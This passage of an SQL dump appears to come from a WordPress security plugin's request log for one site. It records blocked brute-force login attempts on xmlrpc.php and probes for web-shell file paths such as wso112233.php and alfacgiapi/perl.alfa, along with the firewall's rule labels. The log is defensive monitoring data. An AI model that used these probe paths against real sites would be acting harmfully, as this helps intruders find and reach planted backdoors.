'{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FsZmFuZXcucGhw","category":"brute-force","ssl":1}'),
(51325, 0.000000, 1712320123.966172, '\0\0\0\0\0\0\0\0\0\0ÿÿgÌy', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51326, 0.000000, 1712320127.126195, '\0\0\0\0\0\0\0\0\0\0ÿÿ)Þ³ÿ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51035, 1712310117.799611, 1712310117.506300, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/wso112233.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dzbzExMjIzMy5waHA=","category":"brute-force","ssl":1}'),
(51327, 0.000000, 1712320139.594467, '\0\0\0\0\0\0\0\0\0\0ÿÿ>ª', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51328, 0.000000, 1712320146.471759, '\0\0\0\0\0\0\0\0\0\0ÿÿ-ëÛo', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51329, 0.000000, 1712320157.043462, '\0\0\0\0\0\0\0\0\0\0ÿÿXœŠ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51330, 0.000000, 1712320161.557059, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹s¶', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51331, 0.000000, 1712320162.473939, '\0\0\0\0\0\0\0\0\0\0ÿÿz¢–&', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51332, 0.000000, 1712320177.718056, '\0\0\0\0\0\0\0\0\0\0ÿÿªP˜W', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51333, 0.000000, 1712320181.070390, '\0\0\0\0\0\0\0\0\0\0ÿÿgQíç', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51334, 0.000000, 1712320186.648024, '\0\0\0\0\0\0\0\0\0\0ÿÿ´Jã¿', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51335, 0.000000, 1712320213.660392, '\0\0\0\0\0\0\0\0\0\0ÿÿg¡7›', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51336, 0.000000, 1712320215.125592, '\0\0\0\0\0\0\0\0\0\0ÿÿf°eH', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51337, 0.000000, 1712320216.816588, '\0\0\0\0\0\0\0\0\0\0ÿÿ½IåÒ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51338, 0.000000, 1712320215.923191, '\0\0\0\0\0\0\0\0\0\0ÿÿˆž0w', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51339, 0.000000, 1712320218.152898, '\0\0\0\0\0\0\0\0\0\0ÿÿ1+#ˆ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51340, 0.000000, 1712320221.131124, '\0\0\0\0\0\0\0\0\0\0ÿÿÙ>', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51341, 0.000000, 1712320223.633945, '\0\0\0\0\0\0\0\0\0\0ÿÿ´¿¬„', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51342, 0.000000, 1712320231.133796, '\0\0\0\0\0\0\0\0\0\0ÿÿZñß1', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(50690, 1711808314.699220, 1711808314.245800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/admin.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FkbWluLnBocA==","category":"brute-force","ssl":1}'),
(50665, 1711731886.906541, 1711731886.474900, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-content/plugins/seoo/wsoyanz1.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtY29udGVudC9wbHVnaW5zL3Nlb28vd3NveWFuejEucGhw","category":"brute-force","ssl":1}'),
(50697, 1711810311.453170, 1711810311.128900, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-admin/css/colors/coffee/index.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWFkbWluL2Nzcy9jb2xvcnMvY29mZmVlL2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
(50692, 1711808341.752936, 1711808341.327700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/lv.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2x2LnBocA==","category":"brute-force","ssl":1}'),
(50816, 1712000497.005032, 1712000496.543900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/ae.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FlLnBocA==","category":"brute-force","ssl":1}'),
(50612, 1711731979.892522, 1711731979.499500, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-admin/css/maro.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtYWRtaW4vY3NzL21hcm8ucGhw","category":"brute-force","ssl":1}'),
(50613, 1711731977.904913, 1711731977.540700, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-admin/css/mari.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtYWRtaW4vY3NzL21hcmkucGhw","category":"brute-force","ssl":1}'),
(50847, 1712062378.063052, 1712062377.619400, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/lufix.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2x1Zml4LnBocA==","category":"brute-force","ssl":1}'),
(50815, 1712000506.920706, 1712000506.457900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/moon.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21vb24ucGhw","category":"brute-force","ssl":1}'),
(51891, 1712582127.375088, 1712582126.755400, '\0\0\0\0\0\0\0\0\0\0ÿÿ€Çxî', 0, 403, 0, 0, 0, 'https://happythinking.com/new/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L25ldy93cC1hZG1pbi9pbnN0YWxsLnBocA==","path":"L25ldy93cC1hZG1pbi9pbnN0YWxsLnBocA==","category":"discovery-and-probing","ssl":1}'),
(50667, 1711731883.780211, 1711731883.470700, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-admin/js/about.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtYWRtaW4vanMvYWJvdXQucGhw","category":"brute-force","ssl":1}'),
(50672, 1711731876.151140, 1711731875.738300, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-p.php7', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtcC5waHA3","category":"brute-force","ssl":1}'),
(50679, 0.000000, 1711756255.802997, '\0\0\0\0\0\0\0\0\0\0ÿÿ\\Í6‚', 0, 503, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'https://happythinking.com/wp-login.php?redirect_to=https%3A%2F%2Fhappythinking.com%2Fwp-admin%2F', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50680, 0.000000, 1711757734.522346, '\0\0\0\0\0\0\0\0\0\0ÿÿ\\Í6‚', 0, 503, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'https://happythinking.com/wp-login.php?redirect_to=https%3A%2F%2Fhappythinking.com%2Fwp-admin%2F', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50681, 0.000000, 1711758319.164920, '\0\0\0\0\0\0\0\0\0\0ÿÿR’(X', 0, 503, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'https://happythinking.com/wp-login.php?redirect_to=https%3A%2F%2Fhappythinking.com%2Fwp-admin%2F', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50682, 1711785301.586343, 1711785301.281200, '\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4z', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(51458, 0.000000, 1712320686.927355, '\0\0\0\0\0\0\0\0\0\0ÿÿ]ŒÞq', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(50687, 1711791840.088900, 1711791839.736300, '\0\0\0\0\0\0\0\0\0\0ÿÿ€ÇÉ', 0, 403, 0, 0, 0, 'https://happythinking.com/alfacgiapi/perl.alfa', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FsZmFjZ2lhcGkvcGVybC5hbGZh","category":"brute-force","ssl":1}'),
(50691, 1711808299.468546, 1711808299.057800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/repeater.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JlcGVhdGVyLnBocA==","category":"brute-force","ssl":1}'),
(50688, 1711791831.727744, 1711791830.917100, '\0\0\0\0\0\0\0\0\0\0ÿÿ€ÇÉ', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/apikey/apikey.php?test=hello', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocA==","category":"brute-force","ssl":1}'),
(50866, 1712062418.130231, 1712062417.593500, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/ws.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dzLnBocA==","category":"brute-force","ssl":1}'),
(50856, 1712062365.701753, 1712062365.263800, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/repeater.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JlcGVhdGVyLnBocA==","category":"brute-force","ssl":1}'),
(50888, 1712082303.381183, 1712082302.642200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/mail.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21haWwucGhw","category":"brute-force","ssl":1}'),
(50865, 1712062419.412684, 1712062418.980700, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/dropdown.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Ryb3Bkb3duLnBocA==","category":"brute-force","ssl":1}'),
